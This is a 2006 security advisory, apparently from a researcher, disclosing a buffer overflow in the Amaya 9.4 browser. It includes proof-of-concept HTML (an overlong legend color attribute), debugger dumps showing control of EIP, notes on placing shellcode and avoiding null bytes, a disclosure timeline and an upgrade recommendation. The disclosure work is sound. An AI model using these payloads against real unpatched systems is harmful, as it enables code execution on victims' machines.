-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160
The current releases, Amaya 9.5, is available for Linux, Windows and
now MacOS X (see screenshot). It supports HTML 4.01, XHTML 1.0, XHTML
Basic, XHTML 1.1, HTTP 1.1, MathML 2.0, many CSS 2 features, and
includes SVG support (transformation, transparency, and SMIL animation).
See the "Amaya Overview" page [1] for more details.
The following code snippet forces Amaya 9.4 to crash:
> <legend color="Ax200">
> eax=41414141 ebx=02ae7200 ecx=41414141 edx=41414141 esi=00000000
> edi=00000000 eip=00516135 esp=0012e1cc ebp=007dd6e8 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
>
> 00516114 56 push esi
> 00516115 57 push edi
> 00516116 33ff xor edi,edi
> 00516118 33f6 xor esi,esi
> 0051611a 3bcf cmp ecx,edi
> 0051611c 893d943df101 mov [amaya+0x1b13d94
> (01f13d94)],edi
> 00516122 7511 jnz amaya+0x116135 (00516135)
> 00516124 6a0a push 0xa
> 00516126 e825d80500 call amaya+0x173950 (00573950)
> 0051612b 83c404 add esp,0x4
> 0051612e 8bd7 mov edx,edi
> 00516130 8bc6 mov eax,esi
> 00516132 5f pop edi
> 00516133 5e pop esi
> 00516134 c3 ret
> FAULT ->00516135 8b4134 mov eax,[ecx+0x34]
> ds:0023:41414175=???
> 00516138 3bc7 cmp eax,edi
> 0051613a 74f2 jz amaya+0x11612e (0051612e)
> 0051613c 8b4938 mov ecx,[ecx+0x38]
> 0051613f 5f pop edi
> 00516140 8bd1 mov edx,ecx
> 00516142 5e pop esi
> 00516143 c3 ret
> Nopslideβ¦
We are able to control the EIP:
> <legend color=
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAABBBB>
> eax=0ade6e01 ebx=0ac7da00 ecx=0ade6e28 edx=1bce0002 esi=007de85a
> edi=01aeb154 eip=42424242 esp=0012e79c ebp=007da170 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
>
> Funktion: <nosymbols>
> No prior disassembly possible
> 42424242 ?? ???
> 42424244 ?? ???
> 42424246 ?? ???
> 42424248 ?? ???
> 4242424a ?? ???
> 4242424c ?? ???
Online-demo:
http://morph3us.org/security/pen-testing/amaya/amaya-94-legend-color.html
In fact, sucessful exploitation of this vulnerability is not that easy
because non-text characters were modfified during parsing therefore you
have to find a place where to place the shellcode. Naturally you have
to avoid null bytes too because Amaya would stop parsing the attribute
value and the overflow would not get triggered.
21 Dec 05 - Vulnerability discovered.
21 Feb 06 - Vendor contacted.
23 Feb 06 - Vendor confirmed vulnerability.
08 Mar 06 - Vendor fixed vulnerability.
12 Apr 06 - Public release.
Upgrade to the latest version of Amaya. [2]
Thomas Waldegger <[email protected]>
BuHa-Security Community - http://buha.info/board/
If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[email protected]' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.
Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.
Advisory online:
http://morph3us.org/advisories/20060412-amaya-94-2.txt
[1] http://www.w3.org/Amaya/Amaya.html
[2] http://www.w3.org/Amaya/User/BinDist.html
-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/
iD8DBQFEPYDPkCo6/ctnOpYRA+b0AJ0S4sWE2UE0WjMrFBeRKwmWWd9oIwCfSWdX
MW1HldAZyLYolnZ8k/jA/Vw=
=PeiV
-----END PGP SIGNATURE-----